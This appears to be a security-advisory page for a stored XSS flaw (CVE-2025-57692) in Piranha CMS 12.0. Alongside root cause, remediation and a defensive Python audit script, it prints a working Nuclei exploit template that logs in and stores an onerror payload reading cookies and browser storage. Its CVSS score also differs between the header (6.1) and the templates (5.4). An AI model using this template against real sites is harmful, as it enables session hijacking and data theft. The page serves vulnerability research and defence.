[webapps] Piranha CMS 12.0 - Stored XSS in Text Block
CVE-2025-57692
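The Text Block component in Piranha CMS 12.0 has a stored cross-site scripting vulnerability that lets an attacker inject malicious JavaScript code.
Medium · CVSS 6.1
📋 Basic Vulnerability Information
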
| CVE | CVE-2025-57692 |
|---|---|
| Vulnerability type | Stored cross-site scripting (Stored XSS) |
| Affected version | Piranha CMS 12.0 |
| Severity | Medium · CVSS 6.1 |
| Published | 2026-02-02 |
| Submitter | Chidubem Chukwu (Terminal Venom) |
| Source | Exploit-DB original |
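🔬 Root Cause
When a Text Block is edited or saved, user-supplied content is not sufficiently HTML-escaped or filtered, so an XSS payload submitted by an attacker is stored as-is and executed when the page is rendered.
🎯 Attack Scenario
1. The attacker logs in to the Piranha CMS manager backend, or to an account that has text block editing permission.
2. In the text block editor, the attacker enters content containing malicious JavaScript code, for example `<script>alert('XSS')</script>`.
3. The attacker saves the text block, and the payload is stored in the database.
4. Any user who views the page containing that text block (including administrators) triggers script execution, leading to information theft, session hijacking and similar consequences.

💥 Impact
An attacker can execute arbitrary JavaScript code, leading to hijacking of administrator or user sessions, disclosure of sensitive information (such as cookies and page content), or phishing attacks.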
⚔️ Nuclei Exploit Template
The following exploit template is in standard Nuclei v3 format and can be used directly for vulnerability verification:
```yaml
id: CVE-2025-57692-exploit

info:
  name: Piranha CMS 12.0 - Stored XSS Exploit
  author: terminal-venom
  severity: medium
  description: Exploits a stored XSS vulnerability in Piranha CMS 12.0 by injecting a payload into the Text content block of a Standard Page.
  reference:
    - https://github.com/PiranhaCMS/piranha.core/releases/tag/v12.0
    - https://github.com/Saconyfx/security-advisories/blob/main/CVE-2025-57692/advisory.md
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2025-57692
  tags: cve,cve2025,piranha-cms,xss,authenticated
  metadata:
    max-request: 3

variables:
  username: "{{username}}"
  password: "{{password}}"
  page_title: "XSS-Test-{{rand_text_alphanumeric(5)}}"
  xss_payload: |
    <img src="x" onerror="
      alert(
        'Cookies: ' + document.cookie + '\n' +
        'LocalStorage: ' + JSON.stringify(localStorage) + '\n' +
        'SessionStorage: ' + JSON.stringify(sessionStorage) + '\n' +
        'URL: ' + window.location.href + '\n' +
        'User Agent: ' + navigator.userAgent + '\n' +
        'Time: ' + new Date().toLocaleString()
      )
    " />

http:
  - raw:
      - |
        GET /manager/login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /manager/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: {{cookie}}

        __RequestVerificationToken={{token}}&UserName={{username}}&Password={{password}}&RememberMe=false
      - |
        POST /manager/pages HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Cookie: {{cookie_authenticated}}

        {"Title":"{{page_title}}","Content":[{"Type":"TextBlock","Value":"{{xss_payload}}"}]}

    cookie-reuse: true
    extractors:
      - type: regex
        name: token
        part: body
        internal: true
        group: 1
        regex:
          - '__RequestVerificationToken.*?value=([A-Za-z0-9_-]+)'
      - type: regex
        name: cookie
        part: header
        internal: true
        group: 1
        regex:
          - 'Set-Cookie:\s(.+?);'
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Pages"
          - "saved successfully"
        condition: or
      - type: status
        status:
          - 200
          - 302
          - 201
```

🔍 Nuclei Detection Template
The following detection template is used to determine whether a target is affected:
```yaml
id: CVE-2025-57692-detection

info:
  name: Piranha CMS 12.0 - Stored XSS Detection
  author: terminal-venom
  severity: medium
  description: Detects if the target is running Piranha CMS version 12.0 or earlier, which is vulnerable to stored XSS in the Text content block.
  reference:
    - https://github.com/PiranhaCMS/piranha.core/releases/tag/v12.0
    - https://github.com/Saconyfx/security-advisories/blob/main/CVE-2025-57692/advisory.md
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2025-57692
  tags: cve,cve2025,piranha-cms,xss,authenticated

http:
  - raw:
      - |
        GET /manager/login HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Piranha CMS"
          - "manager"
        condition: and
      - type: word
        part: header
        words:
          - "text/html"
    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - 'Piranha\.Version=(\d+\.\d+)'
          - 'Piranha CMS v(\d+\.\d+)'
```

🛡️ Remediation
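Upgrade to Piranha CMS 12.1 or later. Temporary mitigations include configuring web application firewall (WAF) rules that HTML-entity-encode text block input, or having developers strictly HTML-escape user input on the server side (for example with Html.Encode).
📎 References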
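
As an added example (not from the Exploit-DB entry or the Piranha CMS project): a Python audit that parses stored text block values and flags the two payload shapes shown on this page, `<script>` elements and `on*` event-handler attributes, and shows that the HTML-encoded form is inert. The `(block_id, value)` input shape and the sample rows are assumptions; exporting block values from the CMS database is not shown, and this is a triage check, not a sanitizer.

```python
from html import escape
from html.parser import HTMLParser

# Elements that run or embed active content when stored markup is rendered raw.
ACTIVE_TAGS = {"script", "iframe", "object", "embed"}


class ActiveContentFinder(HTMLParser):
    """Records why a stored HTML fragment would execute script in a browser."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names, so <IMG OnError=...>
        # is caught too. Self-closing tags are routed here by the base class.
        if tag in ACTIVE_TAGS:
            self.findings.append(f"<{tag}> element")
        for name, _value in attrs:
            if name.startswith("on"):  # onerror, onload, onclick, ...
                self.findings.append(f"{name} handler on <{tag}>")


def audit_blocks(blocks):
    """Return {block_id: [findings]} for blocks whose value holds active content."""
    flagged = {}
    for block_id, value in blocks:
        finder = ActiveContentFinder()
        finder.feed(value)
        finder.close()
        if finder.findings:
            flagged[block_id] = finder.findings
    return flagged


# Constructed sample rows: (hypothetical block id, stored text block value).
SAMPLE_BLOCKS = [
    ("b1", "<p>Welcome to <strong>our</strong> site</p>"),
    ("b2", "<script>alert('XSS')</script>"),
    ("b3", '<img src="x" onerror="alert(1)" />'),
    # Same markup after HTML entity encoding: parsed as text, not as a tag.
    ("b4", escape('<img src="x" onerror="alert(1)" />')),
]

if __name__ == "__main__":
    for block_id, findings in audit_blocks(SAMPLE_BLOCKS).items():
        print(block_id, findings)
```

Blocks flagged by the audit are candidates for review and cleanup after upgrading; an empty result does not prove the content is clean.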
- https://nvd.nist.gov/vuln/detail/CVE-2025-57692
- https://github.com/PiranhaCMS/piranha.core/issues/1300
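- Exploit-DB original
⚠️ This article is based on public vulnerability databases and is intended for security research and defensive reference only. Generated: 2026-05-07 06:16 | Source: Exploit-DB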